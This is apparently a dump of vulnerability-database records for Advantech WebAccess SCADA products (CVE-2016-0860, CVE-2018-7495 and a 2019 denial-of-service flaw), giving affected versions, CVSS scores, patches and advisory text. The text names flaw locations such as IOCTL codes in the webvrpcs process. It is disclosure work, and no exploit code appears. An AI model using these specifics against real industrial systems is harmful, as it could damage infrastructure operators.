"data": [ { "trust": 4.2, "url": "https://ics-cert.us-cert.gov/advisories/icsa-16-014-01" }, { "trust": 1.4, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-0860" }, { "trust": 1.1, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-058" }, { "trust": 1.1, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-074" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0860" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-074" }, { "db": "ZDI", "id": "ZDI-16-058" }, { "db": "CNVD", "id": "CNVD-2016-00389" }, { "db": "VULHUB", "id": "VHN-88370" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001290" }, { "db": "CNNVD", "id": "CNNVD-201601-333" }, { "db": "NVD", "id": "CVE-2016-0860" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "64d0ec90-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-074" }, { "db": "ZDI", "id": "ZDI-16-058" }, { "db": "CNVD", "id": "CNVD-2016-00389" }, { "db": "VULHUB", "id": "VHN-88370" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001290" }, { "db": "CNNVD", "id": "CNNVD-201601-333" }, { "db": "NVD", "id": "CVE-2016-0860" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-21T00:00:00", "db": "IVD", "id": "64d0ec90-2351-11e6-abef-000c29c66e3d" }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-074" }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-058" }, { "date": "2016-01-21T00:00:00", "db": "CNVD", "id": "CNVD-2016-00389" }, { "date": "2016-01-15T00:00:00", "db": "VULHUB", "id": "VHN-88370" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745" }, { "date": "2016-01-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001290" }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-333" }, { "date": "2016-01-15T03:59:21.890000", "db": "NVD", "id": "CVE-2016-0860" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-074" }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-058" }, { "date": "2016-01-21T00:00:00", "db": "CNVD", "id": "CNVD-2016-00389" }, { "date": "2016-12-06T00:00:00", "db": "VULHUB", "id": "VHN-88370" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745" }, { "date": "2016-01-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001290" }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-333" }, { "date": "2024-11-21T02:42:31.513000", "db": "NVD", "id": "CVE-2016-0860" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-333" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess of BwpAlarm Subsystem buffer overflow vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-001290" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "64d0ec90-2351-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201601-333" } ], "trust": 0.8 } }
var-201805-1141
Vulnerability from variot
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an external control of file name or path vulnerability has been identified, which may allow an attacker to delete files. plural Advantech WebAccess The product contains a path traversal vulnerability.Information may be tampered with. This vulnerability allows remote attackers to delete arbitrary files on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2715 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this functionality to delete files under the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Security vulnerabilities exist in several Advantech products. Multiple SQL-injection vulnerabilities 2. An information-disclosure vulnerability 3. A file-upload vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple stack-based buffer-overflow vulnerabilities 6. A heap-based buffer-overflow vulnerability 7. Multiple arbitrary code-execution vulnerabilities 8. A denial-of-service vulnerability 9. A security-bypass vulnerability 10. A privilege-escalation vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201805-1141", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.2_20170817" }, { "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.0" }, { "model": "webaccess dashboard", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "2.0.15" }, { "model": "webaccess\\/nms", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "2.0.3" }, { "model": "webaccess scada", "scope": "lt", "trust": 1.0, "vendor": "advantech", "version": "8.3.1" }, { "model": "webaccess dashboard", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "2.0.15" }, { "model": "webaccess scada node", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "8.3.1" }, { "model": "webaccess/nms", "scope": "lte", "trust": 0.8, "vendor": "advantech", "version": "2.0.3" }, { "model": "webaccess node", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "model": "webaccess \u003c=8.2 20170817", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.0" }, { "model": "webaccess dashboard", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.0.15" }, { "model": "webaccess/nms", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.0.3" }, { "model": "webaccess scada node", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.1" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.3.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.2_20170817" }, { "model": "webaccess\\/nms", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "2.0.3" }, { "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "*" }, { "model": "webaccess/nms", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0.3" }, { "model": "webaccess/nms", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0" }, { "model": "webaccess scada node", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "model": "webaccess dashboard", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "model": "webaccess 8.2 20170817", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess dashboard", "version": "*" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess scada", "version": "*" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess nms", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2f700a2-39ab-11e9-92ad-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-499" }, { "db": "CNVD", "id": "CNVD-2018-13786" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005070" }, { "db": "CNNVD", "id": "CNNVD-201805-448" }, { "db": "NVD", "id": "CVE-2018-7495" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess_dashboard", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess_scada", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess%2fnms", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-005070" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Steven Seeley (mr_me) of Offensive Security", "sources": [ { "db": "ZDI", "id": "ZDI-18-499" } ], "trust": 0.7 }, "cve": "CVE-2018-7495", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2018-7495", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 7.1, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2018-7495", "impactScore": 6.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CNVD-2018-13786", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "e2f700a2-39ab-11e9-92ad-000c29342cb1", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "VHN-137527", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "CVE-2018-7495", "impactScore": 3.6, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-7495", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2018-7495", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2018-7495", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2018-13786", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201805-448", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "e2f700a2-39ab-11e9-92ad-000c29342cb1", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-137527", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "e2f700a2-39ab-11e9-92ad-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-499" }, { "db": "CNVD", "id": "CNVD-2018-13786" }, { "db": "VULHUB", "id": "VHN-137527" }, { "db": "JVNDB", "id": "JVNDB-2018-005070" }, { "db": "CNNVD", "id": "CNNVD-201805-448" }, { "db": "NVD", "id": "CVE-2018-7495" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an external control of file name or path vulnerability has been identified, which may allow an attacker to delete files. plural Advantech WebAccess The product contains a path traversal vulnerability.Information may be tampered with. This vulnerability allows remote attackers to delete arbitrary files on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2715 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this functionality to delete files under the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Security vulnerabilities exist in several Advantech products. Multiple SQL-injection vulnerabilities\n2. An information-disclosure vulnerability\n3. A file-upload vulnerability\n4. Multiple directory-traversal vulnerabilities\n5. Multiple stack-based buffer-overflow vulnerabilities\n6. A heap-based buffer-overflow vulnerability\n7. Multiple arbitrary code-execution vulnerabilities\n8. A denial-of-service vulnerability\n9. A security-bypass vulnerability\n10. A privilege-escalation vulnerability\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier", "sources": [ { "db": "NVD", "id": "CVE-2018-7495" }, { "db": "JVNDB", "id": "JVNDB-2018-005070" }, { "db": "ZDI", "id": "ZDI-18-499" }, { "db": "CNVD", "id": "CNVD-2018-13786" }, { "db": "BID", "id": "104190" }, { "db": "IVD", "id": "e2f700a2-39ab-11e9-92ad-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-137527" } ], "trust": 3.33 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-7495", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-18-135-01", "trust": 3.4 }, { "db": "BID", "id": "104190", "trust": 2.6 }, { "db": "CNNVD", "id": "CNNVD-201805-448", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-13786", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-005070", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5664", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-499", "trust": 0.7 }, { "db": "IVD", "id": "E2F700A2-39AB-11E9-92AD-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-137527", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2f700a2-39ab-11e9-92ad-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-499" }, { "db": "CNVD", "id": "CNVD-2018-13786" }, { "db": "VULHUB", "id": "VHN-137527" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005070" }, { "db": "CNNVD", "id": "CNNVD-201805-448" }, { "db": "NVD", "id": "CVE-2018-7495" } ] }, "id": "VAR-201805-1141", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "e2f700a2-39ab-11e9-92ad-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-13786" }, { "db": "VULHUB", "id": "VHN-137527" } ], "trust": 1.5434040525000001 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2f700a2-39ab-11e9-92ad-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-13786" } ] }, "last_update_date": "2024-11-23T21:53:07.878000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "\u30c8\u30c3\u30d7\u30da\u30fc\u30b8", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" }, { "title": "Patches for multiple Advantech product file names or path external control vulnerabilities", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/135199" }, { "title": "Multiple Advantech Product security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=80058" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-499" }, { "db": "CNVD", "id": "CNVD-2018-13786" }, { "db": "JVNDB", "id": "JVNDB-2018-005070" }, { "db": "CNNVD", "id": "CNNVD-201805-448" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-22", "trust": 1.9 }, { "problemtype": "CWE-73", "trust": 1.0 } ], "sources": [ { "db": "VULHUB", "id": "VHN-137527" }, { "db": "JVNDB", "id": "JVNDB-2018-005070" }, { "db": "NVD", "id": "CVE-2018-7495" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 4.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-135-01" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/104190" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7495" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7495" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-499" }, { "db": "CNVD", "id": "CNVD-2018-13786" }, { "db": "VULHUB", "id": "VHN-137527" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005070" }, { "db": "CNNVD", "id": "CNNVD-201805-448" }, { "db": "NVD", "id": "CVE-2018-7495" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "e2f700a2-39ab-11e9-92ad-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-499" }, { "db": "CNVD", "id": "CNVD-2018-13786" }, { "db": "VULHUB", "id": "VHN-137527" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005070" }, { "db": "CNNVD", "id": "CNNVD-201805-448" }, { "db": "NVD", "id": "CVE-2018-7495" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-07-24T00:00:00", "db": "IVD", "id": "e2f700a2-39ab-11e9-92ad-000c29342cb1" }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-499" }, { "date": "2018-07-24T00:00:00", "db": "CNVD", "id": "CNVD-2018-13786" }, { "date": "2018-05-15T00:00:00", "db": "VULHUB", "id": "VHN-137527" }, { "date": "2018-05-15T00:00:00", "db": "BID", "id": "104190" }, { "date": "2018-07-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-005070" }, { "date": "2018-05-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-448" }, { "date": "2018-05-15T22:29:00.410000", "db": "NVD", "id": "CVE-2018-7495" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-499" }, { "date": "2018-07-24T00:00:00", "db": "CNVD", "id": "CNVD-2018-13786" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-137527" }, { "date": "2018-05-15T00:00:00", "db": "BID", "id": "104190" }, { "date": "2018-07-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-005070" }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-448" }, { "date": "2024-11-21T04:12:14.620000", "db": "NVD", "id": "CVE-2018-7495" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201805-448" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural Advantech WebAccess Path traversal vulnerability in products", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-005070" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Path traversal", "sources": [ { "db": "IVD", "id": "e2f700a2-39ab-11e9-92ad-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201805-448" } ], "trust": 0.8 } }
var-201904-0184
Vulnerability from variot
Advantech WebAccess/SCADA, Versions 8.3.5 and prior. An improper access control vulnerability may allow an attacker to cause a denial-of-service condition. Advantech WebAccess/SCADA Contains an access control vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within UninstallWA.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. Advantech WebAccess/SCADA is a set of browser-based SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess/SCADA is prone to the following vulnerabilities: 1. Multiple command-injection vulnerabilities 2. A denial-of-service vulnerability 3. Multiple stack-based buffer-overflow vulnerabilities An attacker can exploit these issues to inject and execute arbitrary commands in the context of the application. Failed exploit attempts will result in denial-of-service conditions
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.3.5" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "advantech", "version": "8.3.5 and less" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess/scada", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.5" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.5" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.4" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.2" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess/scada", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.4" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "6a9bb3f5-e6be-4dc2-9d2b-57459a62bf8c" }, { "db": "ZDI", "id": 